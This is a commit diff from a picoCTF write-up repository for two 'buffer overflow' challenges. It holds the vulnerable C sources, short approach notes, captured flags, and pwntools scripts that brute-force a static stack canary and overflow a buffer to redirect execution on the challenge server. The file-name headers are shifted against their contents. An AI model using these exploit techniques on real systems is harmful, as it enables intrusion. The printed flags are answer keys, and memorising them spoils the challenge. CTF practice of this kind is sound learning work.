buffer overflows complete

Author: vivian-dai

Binary Exploitation/buffer overflow 2/README.md

@@ -0,0 +1,12 @@
+# buffer overflow 2
+## Author
+Sanjay C / Palash Oswal
+## Description
+Control the return address and arguments  
+This time you'll need to control the arguments to the function you return to! Can you get the flag from this [program](./vuln)? You can view source [here](./vuln.c). And connect with it using `nc saturn.picoctf.net 51561`
+## Hints
+1. Try using GDB to print out the stack once you write to it.
+## Approach
+Watch [this video](https://youtu.be/eJ0FmCfD-1g) and change a few things to fit the current problem.
+## Flag
+picoCTF{argum3nt5_4_d4yZ_2a8ec317}

Binary Exploitation/buffer overflow 2/vuln

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  if (arg1 != 0xCAFEF00D)
+    return;
+  if (arg2 != 0xF00DF00D)
+    return;
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+  puts(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+

Binary Exploitation/buffer overflow 2/vuln.c

@@ -0,0 +1,16 @@
+# buffer overflow 3
+## Author
+Sanjay C / Palash Oswal
+## Description
+Do you think you can bypass the protection and get the flag? It looks like Dr. Oswal added a stack canary to this [program](./vuln) to protect against buffer overflows. You can view source [here](./vuln.c). And connect with it using:  
+`nc saturn.picoctf.net 63257`
+## Hints
+1. Maybe there's a smart way to brute-force the canary?
+## Approach
+I watched [this video](https://youtu.be/4Eir5gsSIM8) and changed parts of the code (assuming pwntools updated).
+### script.py
+For [`script.py`](./script.py), the goal is to brute force the canary. We do this by just looping through a bunch of characters and spamming it on the shell. Each time a correct character is found, the program will print it then terminate. At each correct character, modify line 4 to be one number higher and append the right character to line 5.
+### exploit.py
+Looking at [`vuln.c`](./vuln.c) tells us the canary is 4 characters long meaning we can stop running [`script.py`](./script.py) once we get 4 characters. We find the canary is "BiRd". When we get to 4 characters, we know the canary and can overflow the buffer. If we run `gdb vuln` and then `disassemble win` we can find the address of the win function. After that, we can build the [exploit script](./exploit.py) and run it to get the flag.
+## Flag
+picoCTF{Stat1C_c4n4r13s_4R3_b4D_f7c1f50a}

Binary Exploitation/buffer overflow 3/README.md

@@ -0,0 +1,6 @@
+from pwn import *
+p = remote("saturn.picoctf.net", 63257)
+p.sendline(b"92") # 68
+p.sendline(b"A"*64 + b"BiRd" + b"A"*16 + p32(0x08049336))
+
+p.interactive()

Binary Exploitation/buffer overflow 3/exploit.py

@@ -0,0 +1,9 @@
+from pwn import *
+for i in range(33, 256):
+  p = remote("saturn.picoctf.net", 63257)
+  p.sendline(b"66")
+  p.sendline(b"a"*64 + b"B" + chr(i).encode())
+  ans = p.recvall().decode()
+  if "Ok" in ans:
+    print(chr(i))
+    break

Binary Exploitation/buffer overflow 3/script.py

@@ -0,0 +1,77 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUFSIZE 64
+#define FLAGSIZE 64
+#define CANARY_SIZE 4
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f); // size bound read
+  puts(buf);
+  fflush(stdout);
+}
+
+char global_canary[CANARY_SIZE];
+void read_canary() {
+  FILE *f = fopen("canary.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'canary.txt' in this directory with your",
+                    "own debugging canary.\n");
+    exit(0);
+  }
+
+  fread(global_canary,sizeof(char),CANARY_SIZE,f);
+  fclose(f);
+}
+
+void vuln(){
+   char canary[CANARY_SIZE];
+   char buf[BUFSIZE];
+   char length[BUFSIZE];
+   int count;
+   int x = 0;
+   memcpy(canary,global_canary,CANARY_SIZE);
+   printf("How Many Bytes will You Write Into the Buffer?\n> ");
+   while (x<BUFSIZE) {
+      read(0,length+x,1);
+      if (length[x]=='\n') break;
+      x++;
+   }
+   sscanf(length,"%d",&count);
+
+   printf("Input> ");
+   read(0,buf,count);
+
+   if (memcmp(canary,global_canary,CANARY_SIZE)) {
+      printf("***** Stack Smashing Detected ***** : Canary Value Corrupt!\n"); // crash immediately
+      exit(-1);
+   }
+   printf("Ok... Now Where's the Flag?\n");
+   fflush(stdout);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  read_canary();
+  vuln();
+  return 0;
+}

Binary Exploitation/buffer overflow 3/vuln

@@ -86,5 +86,7 @@
 |[buffer overflow 1](./Binary%20Exploitation/buffer%20overflow%201/)|200|
 |[RPS](./Binary%20Exploitation/RPS)|200|
 |[x-sixty-what](./Binary%20Exploitation/x-sixty-what)|200|
+|[buffer overflow 2](./Binary%20Exploitation/buffer%20overflow%202)|200|
+|[buffer overflow 3](./Binary%20Exploitation/buffer%20overflow%203)|300|
 
 </details>